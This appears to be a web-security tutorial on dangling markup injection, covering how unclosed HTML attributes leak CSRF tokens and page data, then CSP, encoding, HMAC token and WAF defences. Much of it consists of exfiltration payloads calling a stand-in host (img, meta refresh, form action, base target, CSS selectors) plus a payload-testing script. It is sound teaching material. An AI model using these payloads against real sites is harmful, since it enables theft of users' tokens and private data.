Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

Understanding the Silent Data Exfiltration Technique That Bypasses Modern Web Security

In the ever-evolving landscape of web application security, attackers continuously discover innovative techniques to circumvent defensive measures. While Content Security Policy (CSP) and input filters have become increasingly effective at preventing traditional Cross-Site Scripting (XSS) attacks, a sophisticated exploitation method called Dangling Markup Injection offers attackers an alternative path to exfiltrate sensitive data without executing JavaScript code. This technique leverages fundamental browser behavior and HTML parsing mechanisms to capture confidential information, including CSRF tokens, session identifiers, and personal data.

What is Dangling Markup Injection?

Dangling markup injection is a technique for capturing data cross-domain in situations where a full cross-site scripting attack isn’t possible. Unlike conventional XSS attacks that require script execution, dangling markup exploits the way browsers parse incomplete HTML tags and attributes.

The attack exploits an unclosed tag or attribute to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it. The fundamental principle relies on the browser’s lenient parsing behavior: when encountering an unclosed attribute or tag, browsers continue reading subsequent content until they find the appropriate closing delimiter.

The Core Mechanism

The attack works by injecting HTML that contains an opening tag with an incomplete attribute. When the browser parses the response, it keeps reading until it meets the quotation mark that matches the one opening the attribute. For a URL attribute such as src, everything up to that character is treated as part of the URL and is sent to the attacker’s server within the URL query string.

Consider a vulnerable web application that embeds user-controllable data into its HTML response without proper sanitization:

<input type="text" name="search" value="USER_INPUT_HERE">

If the application fails to escape characters like > or ", an attacker can inject a malicious payload that breaks out of the existing context and introduces a new HTML element with an unclosed attribute.

How Dangling Markup Injection Works

Basic Attack Vector

The most straightforward implementation of this technique involves injecting an image tag with an unclosed src attribute. Here’s how the attack unfolds:

Original vulnerable HTML:

<input type="text" name="email" value="USER_CONTROLLED_INPUT">
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Attacker’s payload:

"><img src='https://attacker.com/collect?data=

Resulting HTML after injection:

<input type="text" name="email" value=""><img src='https://attacker.com/collect?data=
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

The consequence of the attack is that the attacker can capture part of the application’s response following the injection point, which might contain sensitive data such as CSRF tokens, email messages, or financial data.

When the browser renders this page, it interprets everything between the injected src='https://attacker.com/collect?data= and the next single quote as part of the image URL. The hidden field here uses double quotes, so the capture runs past the CSRF token and stops only at the first single quote that appears later in the page. The browser then automatically makes a GET request that begins with:

https://attacker.com/collect?data=<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Characters that are not allowed in a URL are percent-encoded when the request is made, so the attacker receives the content between the injection point and the closing delimiter in a form that is easy to decode.
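The capture can be modeled in a few lines of Python. The sketch below is a deliberately simplified stand-in for the browser's tokenizer, not a real HTML parser: it finds the injected src=' and returns everything up to the next single quote. The simulate_capture name and the trailing paragraph containing an apostrophe are assumptions added for illustration.

```python
from typing import Optional


def simulate_capture(page: str, opener: str = "src='") -> Optional[str]:
    """Return the text a dangling single-quoted attribute would absorb.

    Simplified model: real browsers tokenize HTML, this only scans for quotes.
    """
    start = page.find(opener)
    if start == -1:
        return None  # payload not present
    value_start = start + len(opener)
    end = page.find("'", value_start)
    if end == -1:
        return None  # no closing quote anywhere: nothing is captured
    return page[value_start:end]


# Hypothetical page: the article's example plus a later line with an apostrophe.
page = (
    '<input type="text" name="email" value="">'
    "<img src='https://attacker.com/collect?data=\n"
    '<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">\n'
    "<p>Don't share this page</p>"
)

captured = simulate_capture(page)
print(repr(captured))
```

The captured string contains the whole hidden input, including the token, and ends at the apostrophe in the later paragraph.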

Alternative Exploitation Techniques

While image tags are the most common vector, attackers can exploit various HTML elements that make external requests:

1. Meta Refresh Tags

"><meta http-equiv="refresh" content="0;url=https://attacker.com/exfil?

This payload redirects the page while capturing subsequent content in the URL parameters.

2. Form Action Manipulation

Attackers can inject incomplete form tags to redirect form submissions:

"><form action='https://attacker.com/capture?

Any form data submitted on the page will be sent to the attacker’s server along with the captured markup.

3. Base Tag Exploitation

The target attribute on a base tag sets the default window name used by every link on the page. If an attacker injects a base tag with an incomplete target attribute, that window name becomes all the markup between the injection point and the next matching quote.

<a href="https://attacker.com/payload.html"><font size=100 color=red>Click here</font></a>
<base target='

When a user clicks any link on the page, the window.name property of the destination window will contain all HTML content up to the next single quote. Because window.name has traditionally persisted across navigations to other origins, the attacker’s page can read it.

4. CSS-Based Exfiltration

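When an attacker can inject a style block, CSS attribute selectors can be combined with properties that load external resources, such as background-image, to exfiltrate attribute values from the page. Strictly speaking this is CSS injection rather than dangling markup, but it serves the same goal of leaking data without JavaScript. The @import rule can additionally be used to pull in further attacker-controlled stylesheets.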

<style>
input[name=csrf_token][value^=a]{
  background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf_token][value^=b]{
  background-image: url(https://attacker.com/exfil/b);
}
</style>

The attribute selector [value^=a] is a prefix match, not a regular expression: it matches any input whose value starts with the letter a. If such an element exists and is rendered, the browser loads the corresponding URL as its background image. Repeating this for each candidate prefix enables character-by-character extraction of sensitive tokens.

Why Dangling Markup is Particularly Dangerous

Bypasses Traditional XSS Defenses

Dangling markup can work even when a CSP blocks script execution, doesn’t require JavaScript, and can steal CSRF tokens and any other sensitive data that appears in the page.

Modern web applications typically implement multiple layers of defense:

Input validation and filtering - Blocks <script> tags and JavaScript event handlers
Content Security Policy (CSP) - Prevents execution of inline scripts and restricts resource loading
XSS Auditor / XSS Filter - Browser-based detection of reflected scripts (since removed from Chrome and Edge)
Output encoding - Escapes dangerous characters in user input

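Dangling markup injection circumvents the script-focused protections in this list (correct output encoding does stop it, but is often applied inconsistently) because: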

No JavaScript execution required - The attack relies purely on HTML structure and browser behavior
Legitimate HTML elements - Uses standard tags like <img>, <meta>, and <form> that applications often allow
Subtle syntax - The attack doesn’t introduce obviously malicious patterns that filters typically detect
Browser-native behavior - Exploits fundamental HTML parsing rules rather than security vulnerabilities

Real-World Impact Scenarios

CSRF Token Theft

The most critical application of dangling markup injection involves stealing CSRF tokens. Once an attacker obtains a valid CSRF token associated with a user’s session, they can:

Perform unauthorized state-changing operations
Modify user account settings
Initiate financial transactions
Change passwords or email addresses
Delete user data

Sensitive Information Leakage

Beyond CSRF tokens, attackers can exfiltrate:

Personal Identifiable Information (PII) - Names, addresses, phone numbers
Financial data - Credit card details, bank account information
Session identifiers - Enabling session hijacking attacks
Email content - Messages displayed on the page
Private messages - Chat conversations, notifications
API keys and secrets - Exposed in hidden form fields or JavaScript variables

Reconnaissance and Profiling

Even when immediate exploitation isn’t possible, captured data provides valuable intelligence:

Application structure and hidden functionality
Internal parameter names and formats
CSRF token generation patterns
User behavior and interaction patterns

Browser Behavior and Parsing Quirks

How Browsers Handle Unclosed Attributes

Modern browsers implement lenient HTML parsing based on the HTML5 specification. This permissive approach prioritizes user experience over strict syntax enforcement. When encountering an unclosed attribute:

The browser enters an attribute value context
It continues consuming characters until finding a matching quote
Subsequent opening quotes are treated as literal characters
The attribute remains open across multiple lines and nested elements
Only the matching closing quote terminates the attribute; if the document ends first, the parser discards the unfinished tag and no request is made

This behavior, designed to handle malformed HTML gracefully, creates the exact vulnerability that dangling markup exploits.

URL Encoding and Data Transmission

Because the captured markup is percent-encoded in transit, attackers receive it in a predictable format:

https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%22token123%22%3E

Decoding this URL reveals the original HTML structure, allowing attackers to extract specific values programmatically.
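As a rough illustration of that decoding step, the sketch below uses Python's standard urllib.parse module on the example URL above. The extract_field_value helper and its regular expression are assumptions for this example; real captured markup is usually messier and may need a proper HTML parser.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

captured_url = (
    "https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22%20"
    "name%3D%22csrf%22%20value%3D%22token123%22%3E"
)


def extract_field_value(url: str, field_name: str) -> Optional[str]:
    """Decode the 'data' query parameter and pull one input's value out of it."""
    params = parse_qs(urlsplit(url).query)  # parse_qs percent-decodes the values
    markup = params.get("data", [""])[0]
    pattern = r'name="{}"[^>]*\bvalue="([^"]*)"'.format(re.escape(field_name))
    match = re.search(pattern, markup)
    return match.group(1) if match else None


print(extract_field_value(captured_url, "csrf"))  # token123
```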

Chrome’s Mitigation Attempts

Chrome mitigates dangling markup attacks by blocking requests from elements such as img when the URL contains both a raw newline and a raw less-than character (<), a combination that is typical of captured markup.

This browser-level mitigation blocks many basic dangling markup payloads but doesn’t eliminate the attack surface entirely. Attackers can:

Use alternative HTML elements not subject to URL restrictions
Exploit protocol schemes other than HTTP (e.g., FTP)
Employ DOM-based techniques that don’t rely on URL parameters
Leverage user interaction-based vectors

Bypassing Content Security Policy (CSP)

While CSP effectively prevents many XSS attacks, dangling markup injection presents unique challenges for CSP-based defenses.

CSP Limitations Against Dangling Markup

It’s quite common for a CSP to block resources like script. However, many CSPs do allow image requests, meaning you can often use img elements to make requests to external servers to disclose CSRF tokens.

A typical CSP might include:

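Content-Security-Policy: script-src 'self'; object-src 'none'

This policy restricts scripts and plugins but says nothing about images, so external image loads are allowed and the application remains vulnerable to basic dangling markup attacks. By contrast, a policy that sets default-src 'self' without an explicit img-src restricts images to the same origin, because img-src falls back to default-src.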
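Whether an img-based payload can reach an external host depends on the effective img-src, which falls back to default-src when no img-src is given. The following sketch shows one way to check that for a policy string. The function names are hypothetical, and the "external" test is a simplification that treats any source other than 'self' or 'none' as external.

```python
from typing import Dict, List, Optional


def parse_csp(policy: str) -> Dict[str, List[str]]:
    """Split a CSP header value into {directive: [source, ...]}."""
    directives: Dict[str, List[str]] = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            # If a directive is repeated, the first occurrence is kept.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def effective_sources(policy: str, directive: str) -> Optional[List[str]]:
    """Return the source list governing a fetch directive, or None if unrestricted."""
    directives = parse_csp(policy)
    if directive in directives:
        return directives[directive]
    return directives.get("default-src")  # fallback for fetch directives


def allows_external_images(policy: str) -> bool:
    sources = effective_sources(policy, "img-src")
    if sources is None:
        return True  # neither img-src nor default-src: images are unrestricted
    # Simplification: anything beyond 'self' / 'none' counts as external.
    return any(source not in ("'self'", "'none'") for source in sources)


print(allows_external_images("script-src 'self'"))                   # True
print(allows_external_images("default-src 'none'; img-src 'self'"))  # False
```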

CSP Directives for Mitigation

Policies that restrict img-src will prevent some dangling markup exploits, because the easiest way to capture data with no user interaction is an img tag. They will not prevent other exploits, such as those that inject an anchor tag with a dangling href attribute.

More restrictive policies might include:

Content-Security-Policy: default-src 'none'; img-src 'self'; base-uri 'none'

However, even strict CSPs can be bypassed through the techniques described next.

DOM-Based Dangling Markup Techniques

Even in the most CSP-restricted environments, data can still be exfiltrated with some user interaction by using the base target attribute.

Example exploitation with restrictive CSP:

<a href="http://attacker.com/payload.html">
  <font size=100 color=red>You must click me</font>
</a>
<base target='

The target attribute inside the base tag absorbs the HTML content up to the next single quote. If the victim clicks the link, that content becomes the value of window.name in the destination window, where the attacker’s page can read it cross-domain.

Iframe Name Exploitation

Attackers can abuse iframe name attributes to bypass CSP restrictions:

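<!-- Hosted on the attacker's page; the payload "><iframe name=' is URL-encoded in the query string -->
<iframe src="vulnerable-page.php?input=%22%3E%3Ciframe%20name=%27" onload="exfiltrate(this.contentWindow)">
</iframe>

The iframe injected into the vulnerable page has a dangling name attribute that absorbs the page content following it. Script on the attacker’s page (the exfiltrate function here is a placeholder) can then navigate that inner frame to a document it is allowed to read, such as about:blank, and read its window.name, in browsers where the name survives the navigation.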

Advanced Exploitation Techniques

Automated Token Extraction

Sophisticated attackers deploy automated systems to extract specific values from captured markup. CSS attribute selectors can be used to exfiltrate CSRF tokens character-by-character by injecting multiple selectors that trigger requests based on token prefix matches.

<style>
input[name=csrftoken][value^=a]{ background-image: url(https://attacker.com/exfil/a); }
input[name=csrftoken][value^=b]{ background-image: url(https://attacker.com/exfil/b); }
/* ... continued for all characters ... */
input[name=csrftoken][value^=a0]{ background-image: url(https://attacker.com/exfil/a0); }
input[name=csrftoken][value^=a1]{ background-image: url(https://attacker.com/exfil/a1); }
</style>

Based on which URLs receive requests, attackers reconstruct the complete token value. Tools like cssrf automate this entire process.

Multi-Stage Attacks

Dangling markup often serves as the initial phase in complex attack chains:

Reconnaissance - Extract page structure and identify sensitive fields
Token capture - Steal CSRF tokens using dangling markup
Session hijacking - Use captured session identifiers
Privilege escalation - Perform administrative actions with stolen credentials
Data exfiltration - Access sensitive information using elevated privileges

Persistent Attacks

By injecting payloads into stored data (comments, profiles, messages), attackers create persistent dangling markup attacks that affect every user viewing the compromised content. This transforms a single vulnerability into a wide-scale data harvesting operation.

Real-World Vulnerabilities and Case Studies

Social Media Platforms

Social media applications frequently allow limited HTML in user-generated content (comments, posts, bios). Insufficient sanitization has led to dangling markup vulnerabilities where attackers:

Captured authentication tokens from victim profiles
Exfiltrated private message previews
Harvested user session data
Built detailed user behavior profiles

E-commerce Websites

Online shopping platforms have been exploited through dangling markup in:

Product review sections
Customer support ticket systems
Wishlist and shopping cart features
Payment form validation messages

Data exposed on such pages can include credit card information, billing addresses, and order history.

Email Web Clients

Webmail services represent prime targets because:

Emails contain highly sensitive information
HTML rendering is necessary for formatted messages
Users expect rich content from legitimate senders
Multiple email accounts may be accessed from single sessions

Dangling markup in email content has enabled attackers to:

Steal inbox content
Capture email addresses and contact lists
Harvest authentication codes sent via email
Monitor correspondence in real-time

Comprehensive Prevention and Mitigation Strategies

Input Validation and Sanitization

You can prevent dangling markup attacks using the same general defenses for preventing cross-site scripting, by encoding data on output and validating input on arrival.

Strict Input Validation

Implement whitelisting-based validation that only allows explicitly permitted characters and patterns:

import re

def validate_user_input(input_string):
    # Only allow alphanumeric characters, spaces, and basic punctuation
    allowed_pattern = re.compile(r'^[a-zA-Z0-9\s.,!?-]+$')
    
    if not allowed_pattern.match(input_string):
        raise ValueError("Invalid characters detected")
    
    # Additional length restrictions
    if len(input_string) > 200:
        raise ValueError("Input too long")
    
    return input_string

Context-Aware Output Encoding

Apply appropriate encoding based on where data will be rendered:

import html

def safe_html_render(user_data):
    # HTML entity encoding for display in HTML context
    return html.escape(user_data, quote=True)

html.escape always escapes &, <, and >. With quote=True (the default) it also escapes both single and double quotes, preventing breakout from quoted attribute contexts.
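To make the effect concrete, here is a small sketch that runs the payload from the basic attack through html.escape before placing it in a double-quoted attribute. The template string is a hypothetical stand-in for whatever the application actually renders.

```python
import html

# The payload from the basic attack vector described earlier.
payload = "\"><img src='https://attacker.com/collect?data="

# Hypothetical template: user input placed inside a double-quoted attribute.
rendered = '<input type="text" name="email" value="{}">'.format(html.escape(payload))

print(rendered)
```

The quotes and angle brackets arrive as entities (&quot;, &gt;, &lt;, &#x27;), so the value stays inside the original attribute and no new img element is created.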

Content Security Policy Configuration

Prevention methods include strict HTML attribute encoding, CSP restrictions on where images and form submissions may be sent (img-src, form-action), and input validation that detects incomplete tags.

Restrictive CSP Headers

Implement a defense-in-depth CSP that limits multiple attack vectors:

Content-Security-Policy:
  default-src 'none';
  script-src 'self' 'nonce-{random}';
  style-src 'self';
  img-src 'self';
  font-src 'self';
  connect-src 'self';
  frame-src 'none';
  base-uri 'none';
  form-action 'self';
  frame-ancestors 'none';

Key directives for dangling markup prevention:

img-src 'self' - Prevents external image loading
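base-uri 'none' - Prevents an injected base tag from changing the document base URL (it does not restrict the target attribute)
form-action 'self' - Restricts form submission destinations
connect-src 'self' - Limits fetch/XHR and WebSocket connections (relevant only if script is already running)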
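One way to emit such a policy is to build the header value per response so that each response gets a fresh nonce. The sketch below is a minimal illustration; build_csp_header is a hypothetical helper name, and the directive list simply mirrors the example policy above.

```python
import secrets
from typing import Tuple


def build_csp_header() -> Tuple[str, str]:
    """Return (nonce, header_value) for a single response."""
    nonce = secrets.token_urlsafe(16)  # fresh, unpredictable value per response
    directives = [
        "default-src 'none'",
        f"script-src 'self' 'nonce-{nonce}'",
        "style-src 'self'",
        "img-src 'self'",
        "font-src 'self'",
        "connect-src 'self'",
        "frame-src 'none'",
        "base-uri 'none'",
        "form-action 'self'",
        "frame-ancestors 'none'",
    ]
    return nonce, "; ".join(directives)


nonce, header_value = build_csp_header()
print("Content-Security-Policy:", header_value)
```

The same nonce would then be placed on each legitimate script tag the server renders for that response.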

CSP Reporting

Enable CSP violation reporting to detect attempted attacks:

Content-Security-Policy: default-src 'self'; report-uri /csp-violation-report

Monitor and analyze reports to identify attack patterns and vulnerable endpoints.
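Browsers that honor report-uri POST a JSON document whose top-level key is csp-report. The sketch below pulls out the fields that are usually most useful for triage; summarize_csp_report is a hypothetical helper, and a real endpoint would also need authentication-free request handling, size limits, and rate limiting.

```python
import json
from typing import Dict


def summarize_csp_report(body: bytes) -> Dict[str, str]:
    """Extract triage fields from a legacy report-uri payload."""
    report = json.loads(body.decode("utf-8")).get("csp-report", {})
    return {
        "page": report.get("document-uri", ""),
        # Newer browsers send effective-directive; older ones only violated-directive.
        "directive": report.get("effective-directive")
        or report.get("violated-directive", ""),
        "blocked": report.get("blocked-uri", ""),
    }


# Illustrative report body; the URLs are made up for the example.
sample = json.dumps({
    "csp-report": {
        "document-uri": "https://example.com/profile",
        "violated-directive": "img-src 'self'",
        "blocked-uri": "https://attacker.com",
    }
}).encode("utf-8")

print(summarize_csp_report(sample))
```

A burst of img-src violations pointing at one unfamiliar host, all from the same page, is the kind of pattern worth investigating.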

Server-Side Protections

Response Header Security

Implement additional security headers:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=(), camera=()
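For a Python application these headers could be attached in one place with a small WSGI wrapper. This is a sketch under the assumption that the application is served through WSGI; security_headers_middleware is a hypothetical name, and most frameworks offer their own hook for the same purpose.

```python
SECURITY_HEADERS = {
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Referrer-Policy": "no-referrer",
    "Permissions-Policy": "geolocation=(), microphone=(), camera=()",
}


def security_headers_middleware(app):
    """Wrap a WSGI app so every response carries the headers above."""

    def wrapped(environ, start_response):
        def start_with_headers(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            # Add only headers the application has not already set itself.
            extra = [
                (name, value)
                for name, value in SECURITY_HEADERS.items()
                if name.lower() not in present
            ]
            return start_response(status, list(headers) + extra, exc_info)

        return app(environ, start_with_headers)

    return wrapped
```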

DOM Sanitization Libraries

Use battle-tested sanitization libraries that understand HTML parsing intricacies:

JavaScript (client-side):

import DOMPurify from 'dompurify';

function sanitizeHTML(dirty) {
    return DOMPurify.sanitize(dirty, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
        ALLOWED_ATTR: [],
        KEEP_CONTENT: true
    });
}

Python (server-side):

from bleach import clean

def sanitize_html(user_input):
    allowed_tags = ['b', 'i', 'em', 'strong', 'p']
    allowed_attrs = {}
    
    return clean(
        user_input,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )

Application Architecture Considerations

Separation of Contexts

Strictly separate different security contexts:

Never mix user-controlled data with sensitive information in the same HTML structure
Use separate pages or AJAX endpoints for operations involving CSRF tokens
Implement token delivery through HTTP headers rather than HTML body

Token Protection Strategies

CSRF tokens should be generated on the server side, either once per user session or once per request. Per-request tokens are more secure than per-session tokens because they leave an attacker only a short window in which a stolen token is still valid.

Best practices for CSRF token management:

Server-side generation only - Never generate tokens in JavaScript
Strong randomness - Use cryptographically secure random number generators
Session binding - Tie tokens to specific user sessions
Short expiration - Implement time-based token invalidation
HTTP-only cookies - Prevent JavaScript access to session cookies
SameSite cookie attribute - Restrict cross-origin cookie transmission
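Several of these practices (strong randomness, session binding, short expiration, single use) can be combined in a small token store. The class below is an in-memory sketch for illustration only; the OneTimeTokenStore name, the five-minute default lifetime, and the optional now parameter (used to make expiry testable) are assumptions, and a production system would use shared, persistent storage.

```python
import secrets
import time
from typing import Dict, Optional, Tuple


class OneTimeTokenStore:
    """In-memory per-request CSRF tokens with a short lifetime."""

    def __init__(self, ttl_seconds: float = 300.0) -> None:
        self.ttl_seconds = ttl_seconds
        # token -> (session_id, expiry timestamp)
        self._tokens: Dict[str, Tuple[str, float]] = {}

    def issue(self, session_id: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # cryptographically secure randomness
        self._tokens[token] = (session_id, now + self.ttl_seconds)
        return token

    def consume(self, token: str, session_id: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        entry = self._tokens.pop(token, None)  # single use: removed on first check
        if entry is None:
            return False
        owner, expiry = entry
        return owner == session_id and now <= expiry


store = OneTimeTokenStore(ttl_seconds=300)
token = store.issue("session-abc")
print(store.consume(token, "session-abc"))  # True
print(store.consume(token, "session-abc"))  # False
```

With this design, a token leaked through dangling markup is useless once the legitimate request has consumed it or the lifetime has passed.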

Double-Submit Cookie Pattern

The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user’s authenticated session. Always bind the CSRF token explicitly to session-specific data and use a Hash-based Message Authentication Code (HMAC) with a server-side secret key.

Implementation example:

import hmac
import hashlib
import secrets

def generate_csrf_token(session_id, secret_key):
    # Generate random token
    random_token = secrets.token_urlsafe(32)
    
    # Create HMAC signature binding token to session
    signature = hmac.new(
        secret_key.encode(),
        f"{session_id}:{random_token}".encode(),
        hashlib.sha256
    ).hexdigest()
    
    # Combine token and signature
    return f"{random_token}.{signature}"

def validate_csrf_token(token, session_id, secret_key):
    try:
        random_token, signature = token.split('.')
        
        expected_signature = hmac.new(
            secret_key.encode(),
            f"{session_id}:{random_token}".encode(),
            hashlib.sha256
        ).hexdigest()
        
        return hmac.compare_digest(signature, expected_signature)
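    # Malformed or non-string tokens are rejected rather than raising
    except (ValueError, AttributeError, TypeError):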
        return False

Detection and Monitoring

WAF Rules

Configure Web Application Firewall (WAF) rules to detect dangling markup patterns:

# ModSecurity rule example
SecRule REQUEST_BODY "@rx <(?:img|iframe|form|base|meta|link)[^>]*(?:src|href|action|target|content)\s*=\s*['\"][^'\"]*$" \
    "id:100001,\
    phase:2,\
    deny,\
    log,\
    msg:'Potential dangling markup injection detected'"
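The same idea can be prototyped in Python for log analysis or unit tests. This sketch is a heuristic in the spirit of the rule above, not a port of it: the looks_like_dangling_markup name and the exact tag and attribute lists are assumptions, and a pattern like this will miss obfuscated payloads and should complement output encoding rather than replace it.

```python
import re

# An opening tag of interest, then a URL-like attribute whose quoted value
# is still open when the input ends.
DANGLING_RE = re.compile(
    r"<(?:img|iframe|form|base|meta|link|a)\b[^>]*"
    r"\b(?:src|href|action|target|content|name)\s*=\s*"
    r"(['\"])(?:(?!\1).)*\Z",
    re.IGNORECASE | re.DOTALL,
)


def looks_like_dangling_markup(value: str) -> bool:
    """Return True if the input ends inside an unclosed quoted attribute."""
    return DANGLING_RE.search(value) is not None


print(looks_like_dangling_markup("\"><img src='https://attacker.com/collect?data="))  # True
print(looks_like_dangling_markup('<img src="https://example.com/a.png">'))            # False
```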

Anomaly Detection

Monitor application logs for suspicious patterns:

Unusually long URL parameters
Multiple requests with HTML entity encoding
Patterns matching unclosed HTML attributes
Requests originating from unexpected external domains

User Behavior Analytics

Track unusual activities that might indicate exploitation:

Multiple failed form submissions
Rapid sequential requests to different endpoints
Unexpected external resource loading attempts
Changes in user agent or referrer patterns

Testing for Dangling Markup Vulnerabilities

Manual Testing Methodology

Identify injection points - Test all user input fields, URL parameters, HTTP headers
Test character filtering - Verify which characters are blocked: < > " ' /
Inject basic payloads - Try simple incomplete tags: "><img src='http://attacker.com?
Examine source code - Review rendered HTML to confirm injection
Verify data exfiltration - Monitor attacker-controlled server for incoming requests
Test CSP effectiveness - Attempt bypasses using alternative elements

Automated Scanning

Use specialized tools and scripts:

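import requests

def extract_context(body, payload, radius=40):
    # Return the text surrounding the first occurrence of the payload
    index = body.find(payload)
    if index == -1:
        return ''
    start = max(0, index - radius)
    return body[start:index + len(payload) + radius]

def test_dangling_markup(url, parameter):
    # Only run this against applications you are authorized to test
    payloads = [
        '"><img src="http://attacker.com?',
        "'><img src='http://attacker.com?",
        '"><iframe src="http://attacker.com?',
        '"><meta http-equiv="refresh" content="0;url=http://attacker.com?',
        '"><base target="',
    ]
    
    results = []
    for payload in payloads:
        test_data = {parameter: payload}
        response = requests.post(url, data=test_data, timeout=10)
        
        # Check if payload appears unencoded in response
        if payload in response.text:
            results.append({
                'payload': payload,
                'vulnerable': True,
                'context': extract_context(response.text, payload)
            })
    
    return results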

Penetration Testing Checklist

[ ] Test all input fields for HTML injection
[ ] Verify quote character filtering
[ ] Check for angle bracket restrictions
[ ] Test attribute-based injections
[ ] Attempt CSP bypasses
[ ] Verify CSRF token exposure
[ ] Test stored vs reflected injection
[ ] Evaluate user interaction requirements
[ ] Check browser-specific behaviors
[ ] Test mobile application endpoints
[ ] Verify API endpoint security

Developer Security Guidelines

Secure Coding Practices

Assume all input is malicious - Treat user data as untrusted by default
Use framework protections - Leverage built-in security features of modern frameworks
Apply defense in depth - Implement multiple overlapping security layers
Regular security training - Keep development teams updated on emerging threats
Code review focus - Specifically review HTML rendering logic and user input handling

Framework-Specific Recommendations

React

// Automatic escaping by default
function SafeComponent({ userInput }) {
    return <div>{userInput}</div>;  // Safe - React escapes by default
}

// Dangerous - explicitly disabled escaping
function UnsafeComponent({ userInput }) {
    return <div dangerouslySetInnerHTML={{__html: userInput}} />;  // Vulnerable
}

Angular

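// Use built-in sanitization (the service name is illustrative)
import { Injectable, SecurityContext } from '@angular/core';
import { DomSanitizer } from '@angular/platform-browser';

@Injectable({ providedIn: 'root' })
export class SafeHtmlService {
    constructor(private sanitizer: DomSanitizer) {}

    // Returns the sanitized HTML string, or null for null input
    getSafeHtml(userInput: string): string | null {
        return this.sanitizer.sanitize(SecurityContext.HTML, userInput);
    }
}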

Django

{# Template auto-escaping (enabled by default) #}
{{ user_input }}  {# Safe - automatically escaped #}

{# Explicitly disable escaping (dangerous) #}
{{ user_input|safe }}  {# Vulnerable #}

Security Review Checklist

Before deploying code that handles user input:

[ ] All user input is validated against a whitelist
[ ] Output encoding is applied contextually
[ ] CSP headers are properly configured
[ ] CSRF tokens are securely implemented
[ ] No direct HTML concatenation with user data
[ ] Sanitization libraries are up to date
[ ] Security tests include dangling markup scenarios
[ ] Monitoring and logging are properly configured

Conclusion

CSRF tokens are essential for web applications that rely on cookies for authentication, although a full Cross-Site Scripting (XSS) flaw can defeat every CSRF mitigation technique. Dangling markup injection demonstrates that the attack surface extends beyond traditional XSS to include subtle HTML parsing behaviors.

This sophisticated technique highlights the importance of comprehensive security approaches that go beyond blocking obvious attack vectors. One can reduce the chances of getting hit by a dangling markup attack by checking web applications for vulnerability to code injection including HTML tags, checking and sanitizing user input data, introducing content security policies, and using browsers with protection against dangling markup.

Key Takeaways

Dangling markup doesn’t require JavaScript - Making it effective even where CSP or XSS filters block script execution
Multiple exploitation vectors exist - Images, forms, base tags, meta redirects, and CSS all provide attack surfaces
Browser behavior enables attacks - Lenient HTML parsing creates the vulnerability
Defense requires multiple layers - No single mitigation completely eliminates the risk
CSRF tokens remain valuable - Despite potential exposure through dangling markup, they’re still essential
Continuous monitoring is crucial - Detection and response capabilities are as important as prevention

Future Considerations

As web applications evolve, new dangling markup vectors will likely emerge. Browser vendors continue implementing mitigations, but the fundamental HTML parsing behavior that enables these attacks remains necessary for backward compatibility. Security professionals must stay informed about emerging techniques and continually reassess application security postures.

The relationship between usability and security creates inherent tension - allowing rich HTML content improves user experience but expands attack surfaces. Organizations must carefully evaluate their risk tolerance and implement security controls proportional to the sensitivity of protected data.

By understanding dangling markup injection deeply, implementing comprehensive defenses, and maintaining vigilant monitoring, organizations can significantly reduce their exposure to this subtle but dangerous attack vector while preserving the functionality users expect from modern web applications.